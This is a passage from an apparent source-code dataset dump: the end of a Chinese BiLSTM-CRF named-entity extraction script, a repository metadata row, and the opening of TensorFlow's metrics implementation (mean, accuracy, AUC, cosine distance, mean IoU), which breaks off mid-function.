return PER, LOC, ORG
# 输出PER对应的字符
def get_PER_entity(tag_seq, char_seq):
length = len(char_seq)
PER = []
for i, (char, tag) in enumerate(zip(char_seq, tag_seq)):
if tag == 'B-PER':
if 'per' in locals().keys():
PER.append(per)
del per
per = char
if i + 1 == length:
per = per.strip()
per.replace('\n', '')
per.replace('\r', '')
PER.append(per)
if tag == 'I-PER':
per += char
if i + 1 == length:
per = per.strip()
per.replace('\n', '')
per.replace('\r', '')
PER.append(per)
if tag not in ['I-PER', 'B-PER']:
if 'per' in locals().keys():
per=per.strip()
per.replace('\n', '')
per.replace('\r', '')
PER.append(per)
del per
continue
return PER
# 输出LOC对应的字符
def get_LOC_entity(tag_seq, char_seq):
length = len(char_seq)
LOC = []
for i, (char, tag) in enumerate(zip(char_seq, tag_seq)):
if tag == 'B-LOC':
if 'loc' in locals().keys():
LOC.append(loc)
del loc
loc = char
if i + 1 == length:
loc = loc.strip()
loc.replace('\n', '')
loc.replace('\r', '')
LOC.append(loc)
if tag == 'I-LOC':
loc += char
if i + 1 == length:
loc = loc.strip()
loc.replace('\n', '')
loc.replace('\r', '')
LOC.append(loc)
if tag not in ['I-LOC', 'B-LOC']:
if 'loc' in locals().keys():
loc = loc.strip()
loc.replace('\n', '')
loc.replace('\r', '')
LOC.append(loc)
del loc
continue
return LOC
# 输出ORG对应的字符
def get_ORG_entity(tag_seq, char_seq):
length = len(char_seq)
ORG = []
for i, (char, tag) in enumerate(zip(char_seq, tag_seq)):
if tag == 'B-ORG':
if 'org' in locals().keys():
ORG.append(org)
del org
org = char
if i + 1 == length:
org = org.strip()
org = org.replace('\n', '')
org = org.replace('\r', '')
ORG.append(org)
if tag == 'I-ORG':
org += char
if i + 1 == length:
org = org.strip()
org = org.replace('\n', '')
org = org.replace('\r', '')
ORG.append(org)
if tag not in ['I-ORG', 'B-ORG']:
if 'org' in locals().keys():
org = org.strip()
org = org.replace('\n', '')
org = org.replace('\r', '')
ORG.append(org)
del org
continue
return ORG
def predict(model, batch_size, vocab, tag2label, demo_sent, shuffle=False):
"""
Created by jty
预测模块总函数。
输入:保存好的模型、每次预测的句子数、word2id字典、交互界面输入的需要实体抽取的句子
输出:实体抽取的结果
:param model: 保存好的模型
:param batch_size: 每次预测的句子数
:param vocab: word2id
:param shuffle: 默认为False
"""
s_id = 1
sent_id = {}
ckpt_file = tf.train.latest_checkpoint(params.model_path)
print(ckpt_file)
saver = tf.train.Saver()
with tf.Session(config=config) as sess:
# print('============= demo =============')
saver.restore(sess, ckpt_file)
# print('Please input your sentence:')
# demo_sent = input()
#demo_sent = '我在北京上北京大学'
if demo_sent == '' or demo_sent.isspace():
print('See you next time!')
else:
# 打上id标签
for word in demo_sent:
sent_id[s_id] = word
s_id += 1
demo_sent = list(demo_sent.strip())
demo_data = [(demo_sent, ['O'] * len(demo_sent))]
tag = demo_one(model, sess, demo_data, batch_size, vocab, shuffle, tag2label)
PER, LOC, ORG = get_entity(tag, demo_sent)
PER_local = {}
LOC_local = {}
ORG_local = {}
p_id = 1
l_id = 1
o_id = 1
PER_mess = {}
LOC_mess = {}
ORG_mess = {}
# 抽取PER实体长度、位置信息
i = 1
for word in PER:
PER_local['item'] = word
PER_local['tag'] = 'PER'
PER_local['length'] = len(word)
for j in range(i, len(sent_id)):
if word[0] == sent_id[j]:
PER_local['offset'] = j
i = j + len(word)
break
PER_mess[p_id] = deepcopy(PER_local)
p_id += 1
# 抽取LOC实体长度、位置信息
i = 1
for word in LOC:
LOC_local['item'] = word
LOC_local['tag'] = 'LOC'
LOC_local['length'] = len(word)
for j in range(i, len(sent_id)):
if word[0] == sent_id[j]:
LOC_local['offset'] = j
i = j + len(word)
break
LOC_mess[l_id] = deepcopy(LOC_local)
l_id += 1
# 抽取ORG实体长度、位置信息
i = 1
for word in ORG:
ORG_local['item'] = word
ORG_local['tag'] = 'ORG'
ORG_local['length'] = len(word)
for j in range(i, len(sent_id)):
if word[0] == sent_id[j]:
ORG_local['offset'] = j
i = j + len(word)
break
ORG_mess[o_id] = deepcopy(ORG_local)
o_id += 1
#print(PER_mess, LOC_mess, ORG_mess)
return PER_mess, LOC_mess, ORG_mess
def run(demo_sent, flag=False):
embedding_mat = np.random.uniform(-0.25, 0.25, (len(read_dictionary(params.vocab_path)), params.embedding_dim))
embedding_mat = np.float32(embedding_mat)
embeddings = embedding_mat
num_tags = len(params.tag2label)
summary_path = "logs"
model = BiLSTM_CRF(embeddings, params.update_embedding, params.hidden_dim, num_tags, params.clip, summary_path,
params.optimizer)
model.build_graph()
PER_mess, LOC_mess, ORG_mess = predict(model, params.batch_size, read_dictionary(params.vocab_path), params.tag2label, demo_sent)
if flag:
return PER_mess, LOC_mess, ORG_mess
#run('我在北京上北京大学,周恩来是中国总理,我喜欢北京。我在清华大学,毛泽东是中国主席,他去过苏联。') | [
"zxryhjp@yahoo.co.jp"
] | zxryhjp@yahoo.co.jp |
26918a548c2f53fe227743b0c90bdc04e5101662 | 0e27a64e42d87e049284ad263b807e4c64057de9 | /tensorflow/python/ops/metrics_impl.py | 392bb5ea18c96e2ac1e85c7af7d70fba4d7bbd61 | [
"Apache-2.0"
] | permissive | shaayaan16/tensorflow | f721776f322e8e780cd569a7df026886317b9ac5 | 1ec32ec396d8efebac37325edf94b8948f1397b4 | refs/heads/master | 2021-01-12T02:04:58.634427 | 2017-06-07T05:10:35 | 2017-06-07T05:10:35 | 78,465,880 | 0 | 0 | null | 2017-01-09T20:25:38 | 2017-01-09T20:25:38 | null | UTF-8 | Python | false | false | 116,067 | py | # Copyright 2016 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Implementation of tf.metrics module."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from tensorflow.python.framework import dtypes
from tensorflow.python.framework import ops
from tensorflow.python.framework import sparse_tensor
from tensorflow.python.ops import array_ops
from tensorflow.python.ops import check_ops
from tensorflow.python.ops import confusion_matrix
from tensorflow.python.ops import control_flow_ops
from tensorflow.python.ops import math_ops
from tensorflow.python.ops import nn
from tensorflow.python.ops import sets
from tensorflow.python.ops import sparse_ops
from tensorflow.python.ops import state_ops
from tensorflow.python.ops import variable_scope
from tensorflow.python.ops import variables
def _local_variable(initial_value, validate_shape=True, name=None):
"""Create variable and add it to `GraphKeys.LOCAL_VARIABLES` collection.
Args:
initial_value: See variables.Variable.__init__.
validate_shape: See variables.Variable.__init__.
name: See variables.Variable.__init__.
Returns:
New variable.
"""
return variables.Variable(
initial_value, trainable=False,
collections=[ops.GraphKeys.LOCAL_VARIABLES],
validate_shape=validate_shape, name=name)
def _remove_squeezable_dimensions(labels, predictions, weights):
"""Internal version of _remove_squeezable_dimensions which handles weights.
Squeezes `predictions` and `labels` if their rank differs by 1.
Squeezes `weights` if its rank is 1 more than the new rank of `predictions`
This will use static shape if available. Otherwise, it will add graph
operations, which could result in a performance hit.
Args:
labels: Label values, a `Tensor` whose dimensions match `predictions`.
predictions: Predicted values, a `Tensor` of arbitrary dimensions.
weights: Optional weight `Tensor`. It will be squeezed if its rank is 1
more than the new rank of `predictions`
Returns:
Tuple of `predictions`, `labels` and `weights`, possibly with the last
dimension squeezed.
"""
labels, predictions = confusion_matrix.remove_squeezable_dimensions(
labels, predictions)
predictions.get_shape().assert_is_compatible_with(labels.get_shape())
if weights is not None:
weights = ops.convert_to_tensor(weights)
predictions_shape = predictions.get_shape()
predictions_rank = predictions_shape.ndims
weights_shape = weights.get_shape()
weights_rank = weights_shape.ndims
if (predictions_rank is not None) and (weights_rank is not None):
# Use static rank.
if weights_rank - predictions_rank == 1:
weights = array_ops.squeeze(weights, [-1])
elif (weights_rank is None) or (
weights_shape.dims[-1].is_compatible_with(1)):
# Use dynamic rank
weights = control_flow_ops.cond(
math_ops.equal(array_ops.rank(weights),
math_ops.add(array_ops.rank(predictions), 1)),
lambda: array_ops.squeeze(weights, [-1]),
lambda: weights)
return labels, predictions, weights
def _maybe_expand_labels(labels, predictions):
"""If necessary, expand `labels` along last dimension to match `predictions`.
Args:
labels: `Tensor` or `SparseTensor` with shape
[D1, ... DN, num_labels] or [D1, ... DN]. The latter implies
num_labels=1, in which case the result is an expanded `labels` with shape
[D1, ... DN, 1].
predictions: `Tensor` with shape [D1, ... DN, num_classes].
Returns:
`labels` with the same rank as `predictions`.
Raises:
ValueError: if `labels` has invalid shape.
"""
with ops.name_scope(None, 'expand_labels', (labels, predictions)) as scope:
labels = sparse_tensor.convert_to_tensor_or_sparse_tensor(labels)
# If sparse, expand sparse shape.
if isinstance(labels, sparse_tensor.SparseTensor):
return control_flow_ops.cond(
math_ops.equal(
array_ops.rank(predictions),
array_ops.size(labels.dense_shape) + 1),
lambda: sparse_ops.sparse_reshape( # pylint: disable=g-long-lambda
labels,
shape=array_ops.concat_v2((labels.dense_shape, (1,)), 0),
name=scope),
lambda: labels)
# Otherwise, try to use static shape.
labels_rank = labels.get_shape().ndims
if labels_rank is not None:
predictions_rank = predictions.get_shape().ndims
if predictions_rank is not None:
if predictions_rank == labels_rank:
return labels
if predictions_rank == labels_rank + 1:
return array_ops.expand_dims(labels, -1, name=scope)
raise ValueError(
'Unexpected labels shape %s for predictions shape %s.' % (
labels.get_shape(), predictions.get_shape()))
# Otherwise, use dynamic shape.
return control_flow_ops.cond(
math_ops.equal(array_ops.rank(predictions), array_ops.rank(labels) + 1),
lambda: array_ops.expand_dims(labels, -1, name=scope),
lambda: labels)
def _create_local(name, shape, collections=None, validate_shape=True,
dtype=dtypes.float32):
"""Creates a new local variable.
Args:
name: The name of the new or existing variable.
shape: Shape of the new or existing variable.
collections: A list of collection names to which the Variable will be added.
validate_shape: Whether to validate the shape of the variable.
dtype: Data type of the variables.
Returns:
The created variable.
"""
# Make sure local variables are added to tf.GraphKeys.LOCAL_VARIABLES
collections = list(collections or [])
collections += [ops.GraphKeys.LOCAL_VARIABLES]
return variables.Variable(
initial_value=array_ops.zeros(shape, dtype=dtype),
name=name,
trainable=False,
collections=collections,
validate_shape=validate_shape)
def _assert_weights_rank(weights, values):
return check_ops.assert_rank_in(weights, (0, array_ops.rank(values)))
def _broadcast_weights(weights, values):
"""Broadcast `weights` to the same shape as `values`.
This returns a version of `weights` following the same broadcast rules as
`multiply(weights, values)`. When computing a weighted average, use this
function to broadcast `weights` before summing them; e.g.,
`reduce_sum(w * v) / reduce_sum(_broadcast_weights(w, v))`.
Args:
weights: `Tensor` whose rank is either 0, or the same rank as `values`, and
must be broadcastable to `values` (i.e., all dimensions must be either
`1`, or the same as the corresponding `values` dimension).
values: `Tensor` of any shape.
Returns:
`weights` broadcast to `values` shape.
Raises:
ValueError: if `weights` rank is invalid.
"""
weights_shape = weights.get_shape()
values_shape = values.get_shape()
if (weights_shape.is_fully_defined() and
values_shape.is_fully_defined() and
weights_shape.is_compatible_with(values_shape)):
return weights
with ops.control_dependencies((_assert_weights_rank(weights, values),)):
return math_ops.multiply(
weights, array_ops.ones_like(values), name='broadcast_weights')
def _safe_div(numerator, denominator, name):
"""Divides two values, returning 0 if the denominator is <= 0.
Args:
numerator: A real `Tensor`.
denominator: A real `Tensor`, with dtype matching `numerator`.
name: Name for the returned op.
Returns:
0 if `denominator` <= 0, else `numerator` / `denominator`
"""
return array_ops.where(
math_ops.greater(denominator, 0),
math_ops.truediv(numerator, denominator),
0,
name=name)
def _safe_scalar_div(numerator, denominator, name):
"""Divides two values, returning 0 if the denominator is 0.
Args:
numerator: A scalar `float64` `Tensor`.
denominator: A scalar `float64` `Tensor`.
name: Name for the returned op.
Returns:
0 if `denominator` == 0, else `numerator` / `denominator`
"""
numerator.get_shape().with_rank_at_most(1)
denominator.get_shape().with_rank_at_most(1)
return control_flow_ops.cond(
math_ops.equal(
array_ops.constant(0.0, dtype=dtypes.float64), denominator),
lambda: array_ops.constant(0.0, dtype=dtypes.float64),
lambda: math_ops.div(numerator, denominator),
name=name)
def mean(values, weights=None, metrics_collections=None,
updates_collections=None, name=None):
"""Computes the (weighted) mean of the given values.
The `mean` function creates two local variables, `total` and `count`
that are used to compute the average of `values`. This average is ultimately
returned as `mean` which is an idempotent operation that simply divides
`total` by `count`.
For estimation of the metric over a stream of data, the function creates an
`update_op` operation that updates these variables and returns the `mean`.
`update_op` increments `total` with the reduced sum of the product of `values`
and `weights`, and it increments `count` with the reduced sum of `weights`.
If `weights` is `None`, weights default to 1. Use weights of 0 to mask values.
Args:
values: A `Tensor` of arbitrary dimensions.
weights: Optional `Tensor` whose rank is either 0, or the same rank as
`values`, and must be broadcastable to `values` (i.e., all dimensions must
be either `1`, or the same as the corresponding `values` dimension).
metrics_collections: An optional list of collections that `mean`
should be added to.
updates_collections: An optional list of collections that `update_op`
should be added to.
name: An optional variable_scope name.
Returns:
mean: A `Tensor` representing the current mean, the value of `total` divided
by `count`.
update_op: An operation that increments the `total` and `count` variables
appropriately and whose value matches `mean_value`.
Raises:
ValueError: If `weights` is not `None` and its shape doesn't match `values`,
or if either `metrics_collections` or `updates_collections` are not a list
or tuple.
"""
with variable_scope.variable_scope(name, 'mean', (values, weights)):
values = math_ops.to_float(values)
total = _create_local('total', shape=[])
count = _create_local('count', shape=[])
if weights is None:
num_values = math_ops.to_float(array_ops.size(values))
else:
weights = _broadcast_weights(math_ops.to_float(weights), values)
values = math_ops.multiply(values, weights)
num_values = math_ops.reduce_sum(weights)
total_compute_op = state_ops.assign_add(total, math_ops.reduce_sum(values))
count_compute_op = state_ops.assign_add(count, num_values)
mean_t = _safe_div(total, count, 'value')
with ops.control_dependencies([total_compute_op, count_compute_op]):
update_op = _safe_div(total, count, 'update_op')
if metrics_collections:
ops.add_to_collections(metrics_collections, mean_t)
if updates_collections:
ops.add_to_collections(updates_collections, update_op)
return mean_t, update_op
def accuracy(labels, predictions, weights=None, metrics_collections=None,
updates_collections=None, name=None):
"""Calculates how often `predictions` matches `labels`.
The `accuracy` function creates two local variables, `total` and
`count` that are used to compute the frequency with which `predictions`
matches `labels`. This frequency is ultimately returned as `accuracy`: an
idempotent operation that simply divides `total` by `count`.
For estimation of the metric over a stream of data, the function creates an
`update_op` operation that updates these variables and returns the `accuracy`.
Internally, an `is_correct` operation computes a `Tensor` with elements 1.0
where the corresponding elements of `predictions` and `labels` match and 0.0
otherwise. Then `update_op` increments `total` with the reduced sum of the
product of `weights` and `is_correct`, and it increments `count` with the
reduced sum of `weights`.
If `weights` is `None`, weights default to 1. Use weights of 0 to mask values.
Args:
labels: The ground truth values, a `Tensor` whose shape matches
`predictions`.
predictions: The predicted values, a `Tensor` of any shape.
weights: Optional `Tensor` whose rank is either 0, or the same rank as
`labels`, and must be broadcastable to `labels` (i.e., all dimensions must
be either `1`, or the same as the corresponding `labels` dimension).
metrics_collections: An optional list of collections that `accuracy` should
be added to.
updates_collections: An optional list of collections that `update_op` should
be added to.
name: An optional variable_scope name.
Returns:
accuracy: A `Tensor` representing the accuracy, the value of `total` divided
by `count`.
update_op: An operation that increments the `total` and `count` variables
appropriately and whose value matches `accuracy`.
Raises:
ValueError: If `predictions` and `labels` have mismatched shapes, or if
`weights` is not `None` and its shape doesn't match `predictions`, or if
either `metrics_collections` or `updates_collections` are not a list or
tuple.
"""
labels, predictions, weights = _remove_squeezable_dimensions(
labels, predictions, weights=weights)
predictions.get_shape().assert_is_compatible_with(labels.get_shape())
if labels.dtype != predictions.dtype:
predictions = math_ops.cast(predictions, labels.dtype)
is_correct = math_ops.to_float(math_ops.equal(predictions, labels))
return mean(is_correct, weights, metrics_collections,
updates_collections, name or 'accuracy')
def _confusion_matrix_at_thresholds(
labels, predictions, thresholds, weights=None, includes=None):
"""Computes true_positives, false_negatives, true_negatives, false_positives.
This function creates up to four local variables, `true_positives`,
`true_negatives`, `false_positives` and `false_negatives`.
`true_positive[i]` is defined as the total weight of values in `predictions`
above `thresholds[i]` whose corresponding entry in `labels` is `True`.
`false_negatives[i]` is defined as the total weight of values in `predictions`
at most `thresholds[i]` whose corresponding entry in `labels` is `True`.
`true_negatives[i]` is defined as the total weight of values in `predictions`
at most `thresholds[i]` whose corresponding entry in `labels` is `False`.
`false_positives[i]` is defined as the total weight of values in `predictions`
above `thresholds[i]` whose corresponding entry in `labels` is `False`.
For estimation of these metrics over a stream of data, for each metric the
function respectively creates an `update_op` operation that updates the
variable and returns its value.
If `weights` is `None`, weights default to 1. Use weights of 0 to mask values.
Args:
labels: A `Tensor` whose shape matches `predictions`. `labels` will be cast
to `bool`.
predictions: A floating point `Tensor` of arbitrary shape and whose values
are in the range `[0, 1]`.
thresholds: A python list or tuple of float thresholds in `[0, 1]`.
weights: Optional `Tensor` whose rank is either 0, or the same rank as
`labels`, and must be broadcastable to `labels` (i.e., all dimensions must
be either `1`, or the same as the corresponding `labels` dimension).
includes: Tuple of keys to return, from 'tp', 'fn', 'tn', fp'. If `None`,
default to all four.
Returns:
values: Dict of variables of shape `[len(thresholds)]`. Keys are from
`includes`.
update_ops: Dict of operations that increments the `values`. Keys are from
`includes`.
Raises:
ValueError: If `predictions` and `labels` have mismatched shapes, or if
`weights` is not `None` and its shape doesn't match `predictions`, or if
`includes` contains invalid keys.
"""
all_includes = ('tp', 'fn', 'tn', 'fp')
if includes is None:
includes = all_includes
else:
for include in includes:
if include not in all_includes:
raise ValueError('Invaild key: %s.' % include)
labels, predictions, weights = _remove_squeezable_dimensions(
labels, predictions, weights)
predictions.get_shape().assert_is_compatible_with(labels.get_shape())
num_thresholds = len(thresholds)
# Reshape predictions and labels.
predictions_2d = array_ops.reshape(predictions, [-1, 1])
labels_2d = array_ops.reshape(
math_ops.cast(labels, dtype=dtypes.bool), [1, -1])
# Use static shape if known.
num_predictions = predictions_2d.get_shape().as_list()[0]
# Otherwise use dynamic shape.
if num_predictions is None:
num_predictions = array_ops.shape(predictions_2d)[0]
thresh_tiled = array_ops.tile(
array_ops.expand_dims(array_ops.constant(thresholds), [1]),
array_ops.stack([1, num_predictions]))
# Tile the predictions after thresholding them across different thresholds.
pred_is_pos = math_ops.greater(
array_ops.tile(array_ops.transpose(predictions_2d), [num_thresholds, 1]),
thresh_tiled)
if ('fn' in includes) or ('tn' in includes):
pred_is_neg = math_ops.logical_not(pred_is_pos)
# Tile labels by number of thresholds
label_is_pos = array_ops.tile(labels_2d, [num_thresholds, 1])
if ('fp' in includes) or ('tn' in includes):
label_is_neg = math_ops.logical_not(label_is_pos)
if weights is not None:
weights = _broadcast_weights(math_ops.to_float(weights), predictions)
weights_tiled = array_ops.tile(array_ops.reshape(
weights, [1, -1]), [num_thresholds, 1])
thresh_tiled.get_shape().assert_is_compatible_with(
weights_tiled.get_shape())
else:
weights_tiled = None
values = {}
update_ops = {}
if 'tp' in includes:
true_p = _create_local('true_positives', shape=[num_thresholds])
is_true_positive = math_ops.to_float(
math_ops.logical_and(label_is_pos, pred_is_pos))
if weights_tiled is not None:
is_true_positive *= weights_tiled
update_ops['tp'] = state_ops.assign_add(
true_p, math_ops.reduce_sum(is_true_positive, 1))
values['tp'] = true_p
if 'fn' in includes:
false_n = _create_local('false_negatives', shape=[num_thresholds])
is_false_negative = math_ops.to_float(
math_ops.logical_and(label_is_pos, pred_is_neg))
if weights_tiled is not None:
is_false_negative *= weights_tiled
update_ops['fn'] = state_ops.assign_add(
false_n, math_ops.reduce_sum(is_false_negative, 1))
values['fn'] = false_n
if 'tn' in includes:
true_n = _create_local('true_negatives', shape=[num_thresholds])
is_true_negative = math_ops.to_float(
math_ops.logical_and(label_is_neg, pred_is_neg))
if weights_tiled is not None:
is_true_negative *= weights_tiled
update_ops['tn'] = state_ops.assign_add(
true_n, math_ops.reduce_sum(is_true_negative, 1))
values['tn'] = true_n
if 'fp' in includes:
false_p = _create_local('false_positives', shape=[num_thresholds])
is_false_positive = math_ops.to_float(
math_ops.logical_and(label_is_neg, pred_is_pos))
if weights_tiled is not None:
is_false_positive *= weights_tiled
update_ops['fp'] = state_ops.assign_add(
false_p, math_ops.reduce_sum(is_false_positive, 1))
values['fp'] = false_p
return values, update_ops
def auc(labels, predictions, weights=None, num_thresholds=200,
metrics_collections=None, updates_collections=None,
curve='ROC', name=None):
"""Computes the approximate AUC via a Riemann sum.
The `auc` function creates four local variables, `true_positives`,
`true_negatives`, `false_positives` and `false_negatives` that are used to
compute the AUC. To discretize the AUC curve, a linearly spaced set of
thresholds is used to compute pairs of recall and precision values. The area
under the ROC-curve is therefore computed using the height of the recall
values by the false positive rate, while the area under the PR-curve is the
computed using the height of the precision values by the recall.
This value is ultimately returned as `auc`, an idempotent operation that
computes the area under a discretized curve of precision versus recall values
(computed using the aforementioned variables). The `num_thresholds` variable
controls the degree of discretization with larger numbers of thresholds more
closely approximating the true AUC. The quality of the approximation may vary
dramatically depending on `num_thresholds`.
For best results, `predictions` should be distributed approximately uniformly
in the range [0, 1] and not peaked around 0 or 1. The quality of the AUC
approximation may be poor if this is not the case.
For estimation of the metric over a stream of data, the function creates an
`update_op` operation that updates these variables and returns the `auc`.
If `weights` is `None`, weights default to 1. Use weights of 0 to mask values.
Args:
labels: A `bool` `Tensor` whose shape matches `predictions`.
predictions: A floating point `Tensor` of arbitrary shape and whose values
are in the range `[0, 1]`.
weights: Optional `Tensor` whose rank is either 0, or the same rank as
`labels`, and must be broadcastable to `labels` (i.e., all dimensions must
be either `1`, or the same as the corresponding `labels` dimension).
num_thresholds: The number of thresholds to use when discretizing the roc
curve.
metrics_collections: An optional list of collections that `auc` should be
added to.
updates_collections: An optional list of collections that `update_op` should
be added to.
curve: Specifies the name of the curve to be computed, 'ROC' [default] or
'PR' for the Precision-Recall-curve.
name: An optional variable_scope name.
Returns:
auc: A scalar `Tensor` representing the current area-under-curve.
update_op: An operation that increments the `true_positives`,
`true_negatives`, `false_positives` and `false_negatives` variables
appropriately and whose value matches `auc`.
Raises:
ValueError: If `predictions` and `labels` have mismatched shapes, or if
`weights` is not `None` and its shape doesn't match `predictions`, or if
either `metrics_collections` or `updates_collections` are not a list or
tuple.
"""
with variable_scope.variable_scope(
name, 'auc', (labels, predictions, weights)):
if curve != 'ROC' and curve != 'PR':
raise ValueError('curve must be either ROC or PR, %s unknown' %
(curve))
kepsilon = 1e-7 # to account for floating point imprecisions
thresholds = [(i + 1) * 1.0 / (num_thresholds - 1)
for i in range(num_thresholds-2)]
thresholds = [0.0 - kepsilon] + thresholds + [1.0 + kepsilon]
values, update_ops = _confusion_matrix_at_thresholds(
labels, predictions, thresholds, weights)
# Add epsilons to avoid dividing by 0.
epsilon = 1.0e-6
def compute_auc(tp, fn, tn, fp, name):
"""Computes the roc-auc or pr-auc based on confusion counts."""
rec = math_ops.div(tp + epsilon, tp + fn + epsilon)
if curve == 'ROC':
fp_rate = math_ops.div(fp, fp + tn + epsilon)
x = fp_rate
y = rec
else: # curve == 'PR'.
prec = math_ops.div(tp + epsilon, tp + fp + epsilon)
x = rec
y = prec
return math_ops.reduce_sum(math_ops.multiply(
x[:num_thresholds - 1] - x[1:],
(y[:num_thresholds - 1] + y[1:]) / 2.), name=name)
# sum up the areas of all the trapeziums
auc_value = compute_auc(
values['tp'], values['fn'], values['tn'], values['fp'], 'value')
update_op = compute_auc(
update_ops['tp'], update_ops['fn'], update_ops['tn'], update_ops['fp'],
'update_op')
if metrics_collections:
ops.add_to_collections(metrics_collections, auc_value)
if updates_collections:
ops.add_to_collections(updates_collections, update_op)
return auc_value, update_op
def mean_absolute_error(labels, predictions, weights=None,
metrics_collections=None,
updates_collections=None,
name=None):
"""Computes the mean absolute error between the labels and predictions.
The `mean_absolute_error` function creates two local variables,
`total` and `count` that are used to compute the mean absolute error. This
average is weighted by `weights`, and it is ultimately returned as
`mean_absolute_error`: an idempotent operation that simply divides `total` by
`count`.
For estimation of the metric over a stream of data, the function creates an
`update_op` operation that updates these variables and returns the
`mean_absolute_error`. Internally, an `absolute_errors` operation computes the
absolute value of the differences between `predictions` and `labels`. Then
`update_op` increments `total` with the reduced sum of the product of
`weights` and `absolute_errors`, and it increments `count` with the reduced
sum of `weights`
If `weights` is `None`, weights default to 1. Use weights of 0 to mask values.
Args:
labels: A `Tensor` of the same shape as `predictions`.
predictions: A `Tensor` of arbitrary shape.
weights: Optional `Tensor` whose rank is either 0, or the same rank as
`labels`, and must be broadcastable to `labels` (i.e., all dimensions must
be either `1`, or the same as the corresponding `labels` dimension).
metrics_collections: An optional list of collections that
`mean_absolute_error` should be added to.
updates_collections: An optional list of collections that `update_op` should
be added to.
name: An optional variable_scope name.
Returns:
mean_absolute_error: A `Tensor` representing the current mean, the value of
`total` divided by `count`.
update_op: An operation that increments the `total` and `count` variables
appropriately and whose value matches `mean_absolute_error`.
Raises:
ValueError: If `predictions` and `labels` have mismatched shapes, or if
`weights` is not `None` and its shape doesn't match `predictions`, or if
either `metrics_collections` or `updates_collections` are not a list or
tuple.
"""
predictions, labels, weights = _remove_squeezable_dimensions(
labels, predictions, weights)
predictions.get_shape().assert_is_compatible_with(labels.get_shape())
absolute_errors = math_ops.abs(predictions - labels)
return mean(absolute_errors, weights, metrics_collections,
updates_collections, name or 'mean_absolute_error')
def mean_cosine_distance(labels, predictions, dim, weights=None,
metrics_collections=None,
updates_collections=None,
name=None):
"""Computes the cosine distance between the labels and predictions.
The `mean_cosine_distance` function creates two local variables,
`total` and `count` that are used to compute the average cosine distance
between `predictions` and `labels`. This average is weighted by `weights`,
and it is ultimately returned as `mean_distance`, which is an idempotent
operation that simply divides `total` by `count`.
For estimation of the metric over a stream of data, the function creates an
`update_op` operation that updates these variables and returns the
`mean_distance`.
If `weights` is `None`, weights default to 1. Use weights of 0 to mask values.
Args:
labels: A `Tensor` of arbitrary shape.
predictions: A `Tensor` of the same shape as `labels`.
dim: The dimension along which the cosine distance is computed.
weights: Optional `Tensor` whose rank is either 0, or the same rank as
`labels`, and must be broadcastable to `labels` (i.e., all dimensions must
be either `1`, or the same as the corresponding `labels` dimension). Also,
dimension `dim` must be `1`.
metrics_collections: An optional list of collections that the metric
value variable should be added to.
updates_collections: An optional list of collections that the metric update
ops should be added to.
name: An optional variable_scope name.
Returns:
mean_distance: A `Tensor` representing the current mean, the value of
`total` divided by `count`.
update_op: An operation that increments the `total` and `count` variables
appropriately.
Raises:
ValueError: If `predictions` and `labels` have mismatched shapes, or if
`weights` is not `None` and its shape doesn't match `predictions`, or if
either `metrics_collections` or `updates_collections` are not a list or
tuple.
"""
labels, predictions, weights = _remove_squeezable_dimensions(
labels, predictions, weights)
predictions.get_shape().assert_is_compatible_with(labels.get_shape())
radial_diffs = math_ops.multiply(predictions, labels)
radial_diffs = math_ops.reduce_sum(radial_diffs,
reduction_indices=[dim,],
keep_dims=True)
mean_distance, update_op = mean(radial_diffs, weights,
None,
None,
name or 'mean_cosine_distance')
mean_distance = math_ops.subtract(1.0, mean_distance)
update_op = math_ops.subtract(1.0, update_op)
if metrics_collections:
ops.add_to_collections(metrics_collections, mean_distance)
if updates_collections:
ops.add_to_collections(updates_collections, update_op)
return mean_distance, update_op
def mean_iou(labels,
predictions,
num_classes,
weights=None,
metrics_collections=None,
updates_collections=None,
name=None):
"""Calculate per-step mean Intersection-Over-Union (mIOU).
Mean Intersection-Over-Union is a common evaluation metric for
semantic image segmentation, which first computes the IOU for each
semantic class and then computes the average over classes.
IOU is defined as follows:
IOU = true_positive / (true_positive + false_positive + false_negative).
The predictions are accumulated in a confusion matrix, weighted by `weights`,
and mIOU is then calculated from it.
For estimation of the metric over a stream of data, the function creates an
`update_op` operation that updates these variables and returns the `mean_iou`.
If `weights` is `None`, weights default to 1. Use weights of 0 to mask values.
Args:
labels: A `Tensor` of ground truth labels with shape [batch size] and of
type `int32` or `int64`. The tensor will be flattened if its rank > 1.
predictions: A `Tensor` of prediction results for semantic labels, whose
shape is [batch size] and type `int32` or `int64`. The tensor will be
flattened if its rank > 1.
num_classes: The possible number of labels the prediction task can
have. This value must be provided, since a confusion matrix of
dimension = [num_classes, num_classes] will be allocated.
weights: Optional `Tensor` whose rank is either 0, or the same rank as
`labels`, and must be broadcastable to `labels` (i.e., all dimensions must
be either `1`, or the same as the corresponding `labels` dimension).
metrics_collections: An optional list of collections that `mean_iou`
should be added to.
updates_collections: An optional list of collections `update_op` should be
added to.
name: An optional variable_scope name.
Returns:
mean_iou: A `Tensor` representing the mean intersection-over-union.
update_op: An operation that increments the confusion matrix.
Raises:
ValueError: If `predictions` and `labels` have mismatched shapes, or if
`weights` is not `None` and its shape doesn't match `predictions`, or if
either `metrics_collections` or `updates_collections` are not a list or
tuple.
"""
with variable_scope.variable_scope(
name, 'mean_iou', (predictions, labels, weights)):
# Check if shape is compatible.
predictions.get_shape().assert_is_compatible_with(labels.get_shape())
# Local variable to accumulate the predictions in the confusion matrix.
cm_dtype = dtypes.int64 if weights is not None else dtypes.float64
total_cm = _create_local('total_confusion_matrix',
shape=[num_classes, num_classes], dtype=cm_dtype)
# Cast the type to int64 required by confusion_matrix_ops.
predictions = math_ops.to_int64(predictions)
labels = math_ops.to_int64(labels)
num_classes = math_ops.to_int64(num_classes)
# Flatten the input if its rank > 1.
if predictions.get_shape().ndims > 1:
predictions = array_ops.reshape(predictions, [-1])
if labels.get_shape().ndims > 1:
labels = array_ops.reshape(labels, [-1])
if (weights is not None) and (weights.get_shape().ndims > 1):
weights = array_ops.reshape(weights, [-1])
# Accumulate the prediction to current confusion matrix.
current_cm = confusion_matrix.confusion_matrix(
